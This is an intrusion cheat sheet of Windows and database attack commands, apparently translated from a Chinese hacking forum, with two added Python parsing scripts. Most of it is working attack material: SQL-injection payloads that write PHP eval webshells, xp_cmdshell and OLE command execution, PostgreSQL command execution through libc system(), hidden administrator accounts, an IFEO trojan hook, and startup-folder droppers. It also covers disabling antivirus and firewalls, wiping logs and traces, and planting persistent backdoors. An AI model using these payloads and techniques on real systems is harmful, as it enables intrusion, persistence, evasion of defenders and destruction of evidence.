1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". The idea is that if it runs successfully you can leave the password blank when logging in over 3389 and go straight in, then restore it afterwards with net user administrator /passwordreq:yes. Caveat: /passwordreq:no only sets the "password not required" flag on the account (it lets the account hold a blank password despite the length policy); it does not clear a password that is already set, so this only helps where the password is already blank.
2. A neat way to build a clone account
First create an ordinary user, then export its registry keys. Delete the user in Computer Management, re-import the exported keys, then add the account to the Administrators group.
3. Grabbing the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
(reg save writes a binary hive file regardless of the extension; load it with reg load or parse it offline rather than double-clicking it.)
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe" under it, and inside that a string value named Debugger whose data is the full path of your trojan. Image File Execution Options launches the Debugger program in place of the named image whenever that image is started.
5. runas /user:guest cmd
Use this to test what a given user account is allowed to do.
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This just uses the tlntadmn command to remove NTLM from the Telnet server's authentication options so that it falls back to plain password authentication; run tlntadmn /? for the details. (It needs administrator rights.) The alternative, creating an identical user on your own machine and authenticating through NTLM, needs no explanation.
7. After the intrusion: patch the hole, clean up traces, plant backdoors
The basic vulnerabilities you came in through must be fixed (SU privilege escalation, SA injection and so on). For DBO-level injection, consider removing xp_dirtree and xp_regread; make a note of the web directory yourself first. Always clean your traces. For SQL Server, connecting with Enterprise Manager is better than using Query Analyzer, which leaves a record under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers; delete it. Do not wipe the IIS logs completely with an all-in-one tool; use a log-cleaner type tool that removes only the entries for your IP. If you can obtain the administrator's password (for instance through a GINA hook), log in as the administrator to clean the logs and finish the trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that creates no log entries. A few one-line backdoors, a standard backdoor and a CFM backdoor are my usual minimum; remember to adjust their file timestamps. A harsher trick, if the machine is just an ordinary zombie: drop a TXT file on the administrator's desktop telling them you broke in, planted a backdoor and added a user (not your real, important backdoor, of course), and ask them to clean it up. There is a good chance your real backdoor survives that way.
8. Running commands through OLE automation (on SQL Server 2005+ 'Ole Automation Procedures' must be enabled with sp_configure first):
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c <command>'

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. SQL Server 2005 ships with xp_cmdshell switched OFF by default.
To enable it you must first turn on 'show advanced options' and then enable xp_cmdshell.
This can be done straight from the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
Then, if the extended procedure itself has been dropped: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore xp_cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A newer way to restore xp_cmdshell
Once the extended stored procedures have been dropped there is a very simple way to bring them back:

Removal
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc still exists.
-----------------------------
Statement to drop the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'

SQL to restore xp_cmdshell (re-register the extended procedure):
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended procedure exists:
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell and check in one statement:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll (it normally lives in the SQL Server Binn directory) and register it with a full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL to block xp_cmdshell again:
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clear the 3389 (Remote Desktop) connection history with one built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for current_user();

The statements below create a user with the same privileges as root. You will have run into this when taking a site: the MySQL root account may only connect locally and refuses remote connections. The following creates a user itpro with password 123, privileges identical to root, allowed to connect from any host, so you can work on the database remotely from your own machine.

CREATE USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

(IDENTIFIED BY inside GRANT is deprecated in MySQL 5.7 and removed in 8.0, where the CREATE USER line alone sets the password. A '%' user only helps if the server is not bound to 127.0.0.1 and port 3306 is reachable through the firewall.)

When you are done, remember to remove your footprints:

DROP USER 'itpro'@'%';
DROP DATABASE IF EXISTS `itpro`;
Getting SYSTEM from the current user (interactive service trick; needs the right to create services):
sc create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
The cmd window appears on the interactive desktop only on XP/2003; from Vista/2008 on, session 0 isolation keeps service windows off the user's desktop.
Code (an HTML page with a VBScript block that creates a local user "nosec" and adds it to Administrators via ADSI; it only runs in IE or an HTA with script permissions):
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
oe.Add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Getting past the CAPTCHA limitation on a backend login to get a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry and restart IE; that is all. (IE blocks XBM images by default; this re-enables them so that XBM-based CAPTCHA images render.)
Writing a shell with UNION ... INTO OUTFILE
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the DedeCMS injection vulnerability: writes a shell without needing the backend.

In the DedeCMS backend, when there is no file manager and no FILE (outfile) privilege:
go to Plugin management -> Virus scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in exactly that format (the leading >';?> closes the string and PHP block the line is inserted into).
In Oracle, after logging in as a low-privilege user you can run the following to fetch the hashes of SYS and the other users, then crack them with Cain (this needs SELECT on DBA_USERS, e.g. via SELECT ANY DICTIONARY; from 11g the PASSWORD column of DBA_USERS is empty and the hashes live in SYS.USER$):
Code:
select username,password from dba_users;
MySQL remote-connection user
Code:
CREATE USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Find the Terminal Services port

XP & 2003: REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2. Enable Terminal Services on XP & 2003

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
3. Change the Terminal Services port to 20008 (0x4E28); both values must be changed or the two keys disagree

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x4E28 /f
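As an added example (not part of the original notes): a Python script that reads the text a regedit /e export of the Terminal Server key produces, pulls the PortNumber DWORDs out of both keys named above, and flags the situation these notes warn about, where only one of the two was changed. The sample export below is constructed by the editor; a real regedit export is UTF-16 with a byte-order mark, so open it with encoding="utf-16" before handing it to the parser.

```python
import re

# Constructed sample in the shape of `regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\...\Terminal Server"`.
# Here only the Tds\tcp value was moved to 20008 while RDP-Tcp still says 3389.
TSP_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
"PortNumber"=dword:00000d3d
"fEnableWinStation"=dword:00000001
"""

TS_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
TDS_TCP = TS_ROOT + r"\Wds\rdpwd\Tds\tcp"
RDP_TCP = TS_ROOT + r"\WinStations\RDP-Tcp"

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_dwords(text):
    """Return {key_path: {value_name: int}} for every dword value in a .reg export."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = int(m.group(2), 16)
    return result


def rdp_status(text):
    """Summarise the export: is RDP enabled, and do the two PortNumber values agree?"""
    reg = parse_reg_dwords(text)
    tds = reg.get(TDS_TCP, {}).get("PortNumber")
    rdp = reg.get(RDP_TCP, {}).get("PortNumber")
    deny = reg.get(TS_ROOT, {}).get("fDenyTSConnections")
    return {
        "enabled": deny == 0,
        "tds_tcp_port": tds,
        "rdp_tcp_port": rdp,
        "consistent": tds is not None and tds == rdp,
    }


def reg_line_for_port(port):
    """The .reg line that sets PortNumber to `port` (regedit wants 8 hex digits)."""
    return '"PortNumber"=dword:%08x' % port


if __name__ == "__main__":
    status = rdp_status(TSP_REG)
    print(status)
    if not status["consistent"]:
        print("fix the lagging key with:", reg_line_for_port(status["tds_tcp_port"]))
```

The decimal/hex pairs the notes use fall out of the same helper: reg_line_for_port(3389) gives dword:00000d3d and reg_line_for_port(20008) gives dword:00004e28.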
4. Remove the XP & 2003 firewall restriction on the Terminal Services port 3389 and on the IPs allowed to connect (the value format is port:protocol:scope:state:name)

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:@xpsp2res.dll,-22009" /f
5. Enable Terminal Services on Win2000 on port 3389 (reboot required; after building the file, import it with regedit /s 2000.reg)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6. Force a reboot of Win2000 & Win2003 (the machine restarts as soon as the last line runs; the 1 passed to InstallHinfSection is the "reboot" flag)

@ECHO OFF & cd /d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7. Disable TCP/IP port filtering (reboot required; note this writes ControlSet001, which is only the active set if CurrentControlSet points at it)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8. When the terminal server reports that the maximum number of connections has been reached, connect with:

mstsc /v:ip:3389 /console
9. Adjusting NTFS permissions

cacls c: /e /t /g everyone:F (gives everyone full control over the whole C: drive)

cacls %systemroot%\system32\*.exe /d everyone (denies everyone access to the exe files in system32)

------------------------------------------------------
3389.vbs (enables RDP on port 3389 through WMI's StdRegProv and reboots)
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the registry value that loads awgina.dll
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to stop Windows storing LM hashes (it only affects passwords set after the change; existing LM hashes stay until the password is changed).
Database security: common commands for attacking an Oracle database
I recently came across a server running an Oracle database; after cramming Oracle and asking the experts I finally got every user's password for the site's admin interface. I found Oracle really cumbersome to work with, so to save everyone some detours I have collected the commands you need during an intrusion.
1. su - oracle  Not required; useful when you have no DBA password, because it lets you into sqlplus without one.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i
3. SQL> connect / as sysdba; (or as sysoper), or
connect internal/oracle AS SYSDBA; (scott/tiger)  (the internal account was removed in 9i)
conn sys/change_on_install as sysdba;
4. SQL> startup;  Start the database instance
5. View the current database: select * from v$database;
select name from v$database;
6. desc v$database;  Show the columns of the view
7. Which users hold SYSDBA / SYSOPER:
SQL> select * from V_$PWFILE_USERS;
show user;  Show the user of the current connection
8. "Entering the test database": Oracle has no USE/DATABASE command; you choose the instance in the connect string instead (e.g. sqlplus system/manager@test).
9. View the instance: select * from v$instance;
e.g. ora9i
10. List the tables visible to the current user:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. Describe a view: desc all_tables;
12. Show all columns of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Fetch the rows of CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user (test11/test):
create user test11 identified by test default tablespace users temporary tablespace temp;
15. Grant privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a user's password (set sys and system to test):
alter user sys identified by test;
alter user system identified by test;
Java web application configuration files worth hunting for:
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection settings
\WEB-INF\server.xml  roughly the equivalent of httpd.conf + my.ini + php.ini
\WEB-INF\struts-config.xml  the application's file and directory layout

spring.properties holds the name of the hibernate.cfg.xml in use

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these turn up anything, go and read the class files.
Viewing the host's shared folders from inside a VMware guest:
run this in a cmd window inside the virtual machine
\\.host\Shared Folders
Finding the terminal-services port from a cmd shell
Step 1: tasklist /SVC lists every process, the services it hosts and its PID.
The Terminal Services service is named TermService.
Step 2: netstat -ano lists every listening port with its owning PID.
Match the PID from step 1 to a LISTENING port in step 2: that is the RDP port, whatever the registry says.
Query the password hash in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'

Full code for adding a user through MySQL on a Chinese-language Windows (writes a VBS into the all-users Startup folder so it runs at the next logon; needs the FILE privilege and a secure_file_priv setting that does not block the path):

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language Windows:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

Dropping a binary the same way (dumpfile writes the single row raw, without the line terminators and escaping that outfile would add):
create table a (cmd BLOB);
insert into a values (CONVERT(<hex of the executable, as a 0x... literal>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
Notes on dealing with a stubborn Norton
Find the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That does it. But remember to restore the permissions afterwards. Note that a deny entry added with /d stays in the ACL and wins over a later grant, so revoke it first (cacls "..." /t /e /r system, and likewise for the other accounts) before granting:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

Splitting the procedure name to get past keyword filters:
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some PostgreSQL injection notes
Getting a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
Reading a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom C function wrapping libc's system(), the other uses PL/Python. Both need a superuser database account and PostgreSQL 8.x. Note that from 8.2 on the server refuses to load a library that lacks a PG_MODULE_MAGIC block, so pointing CREATE FUNCTION at libc.so.6 directly only works on 8.1 and earlier; later versions need a purpose-built shared object.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, redirecting its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the result back from the table to see whether it worked:

SELECT system_out FROM stdout
Test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC LIMIT 1),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess  stops the built-in Windows firewall service
netsh firewall show config  shows the built-in firewall's configuration
netsh firewall set notifications disable  disables the notification shown when the firewall blocks a program
netsh firewall add allowedprogram c:\1.exe Svchost  adds a program to the firewall's allowed list (here under the display name "Svchost")
Changing the 3389 port (harder to find with a scanner afterwards)
Two places in the server's registry need to be changed:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber, default 3389; set it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber, default 3389; set it to the port you want, e.g. 6000

That is all; reboot the system.
Script to record 3389 remote logons
Save it as a .bat file (the trailing start Explorer suggests it is meant to run in place of the shell at logon):
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
(If the RDP port has been moved as described above, change the ":3389" filter to match.)
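As an added example, not from the original notes: the two-step lookup described earlier (tasklist /SVC to find the PID hosting TermService, then netstat -ano to find the port that PID listens on) done in Python over constructed sample output, plus a parser for the ts.log format the batch file above writes. The process names, PIDs, addresses and timestamps are all made up for the example.

```python
import re

# Constructed sample output (not captured from a real host), in the shape of
# `tasklist /SVC` and `netstat -ano` on Windows XP/2003.  In this sample the RDP
# listener sits on 20008, i.e. the port was moved away from 3389.
TASKLIST_SVC = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    876 RpcSs
svchost.exe                   1104 Browser, CryptSvc, Dhcp, LanmanServer, TermService, Winmgmt
sqlservr.exe                  1520 MSSQLSERVER
"""

NETSTAT_ANO = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1520
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       1104
  TCP    192.168.1.10:20008     203.0.113.7:51234      ESTABLISHED     1104
  TCP    192.168.1.10:20008     198.51.100.9:40001     ESTABLISHED     1104
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed ts.log as the logon batch writes it: date /t, time /t, then the
# `netstat -n -p tcp | find ":3389"` lines.  The date format depends on the locale.
TS_LOG = """\
2011-07-17
04:00
  TCP    192.168.1.10:3389      203.0.113.7:51234      ESTABLISHED
2011-07-18
09:15
  TCP    192.168.1.10:3389      198.51.100.9:40001     ESTABLISHED
  TCP    192.168.1.10:3389      203.0.113.7:52000      ESTABLISHED
"""

_TASK_RE = re.compile(r"^(\S.*?)\s+(\d+)\s+(.*)$")


def pids_for_service(tasklist_text, service="TermService"):
    """PIDs of the processes whose `tasklist /SVC` service list contains `service`."""
    pids = set()
    for line in tasklist_text.splitlines():
        m = _TASK_RE.match(line)
        if m and service in [s.strip() for s in m.group(3).split(",")]:
            pids.add(int(m.group(2)))
    return pids


def parse_netstat(netstat_text):
    """Rows of `netstat -ano` as (proto, local_ip, local_port, remote, state, pid)."""
    rows = []
    for line in netstat_text.splitlines():
        p = line.split()
        if len(p) < 4 or p[0] not in ("TCP", "UDP"):
            continue                      # header, blank and "Active Connections" lines
        state, pid = (p[3], int(p[4])) if p[0] == "TCP" else ("", int(p[3]))
        local_ip, local_port = p[1].rsplit(":", 1)
        rows.append((p[0], local_ip, int(local_port), p[2], state, pid))
    return rows


def rdp_listeners(tasklist_text, netstat_text):
    """TCP ports the TermService host process is LISTENING on: the real RDP port."""
    pids = pids_for_service(tasklist_text, "TermService")
    return sorted({r[2] for r in parse_netstat(netstat_text)
                   if r[0] == "TCP" and r[4] == "LISTENING" and r[5] in pids})


def rdp_peers(tasklist_text, netstat_text):
    """Remote endpoints with an ESTABLISHED connection to an RDP listener port."""
    ports = set(rdp_listeners(tasklist_text, netstat_text))
    return sorted(r[3] for r in parse_netstat(netstat_text)
                  if r[0] == "TCP" and r[4] == "ESTABLISHED" and r[2] in ports)


def parse_ts_log(text):
    """Group the connection lines in ts.log under the date/time lines that precede
    them; returns (stamp, remote_ip, state) tuples."""
    entries, stamp, after_tcp = [], [], False
    for line in text.splitlines():
        p = line.split()
        if not p:
            continue
        if p[0] == "TCP" and len(p) >= 4:
            entries.append((" ".join(stamp), p[2].rsplit(":", 1)[0], p[3]))
            after_tcp = True
        else:                             # a new date/time stamp starts after a TCP block
            if after_tcp:
                stamp, after_tcp = [], False
            stamp.append(line.strip())
    return entries


if __name__ == "__main__":
    print("RDP listening on:", rdp_listeners(TASKLIST_SVC, NETSTAT_ANO))
    print("connected peers:", rdp_peers(TASKLIST_SVC, NETSTAT_ANO))
    for stamp, ip, state in parse_ts_log(TS_LOG):
        print(stamp, ip, state)
```

On a real host feed it the output of subprocess.run(["tasklist", "/SVC"]) and subprocess.run(["netstat", "-ano"]); the parsers only assume the column order those commands print.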
mstsc parameters:

Remote Desktop Connection
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
      [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- the name of the .rdp file for the connection.
/v:<server[:port]> -- the terminal server to connect to.
/console -- connect to the server's console session.
/f -- start the client in full-screen mode.
/w:<width> -- width of the remote desktop screen.
/h:<height> -- height of the remote desktop screen.
/edit -- open the given .rdp file for editing.
/migrate -- migrate legacy connection files created by Client Connection Manager to new .rdp connection files.

mstsc /console attaches to session 0, which on XP/2003 is the console session, i.e. the desktop shown on the physical monitor, whereas plain mstsc opens a separate virtual session, as if logging on to the machine a second time. Worth trying; some software needs it. (On Vista/2008 and later the equivalent switch is /admin, and session 0 no longer hosts an interactive desktop.)
mstsc /console /v:124.42.126.xxx  gets around the terminal connection limit
Enabling 3389 from the command line (the account name asp.net mimics the ASP.NET machine account; the UserList entry hides it from the welcome screen)
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
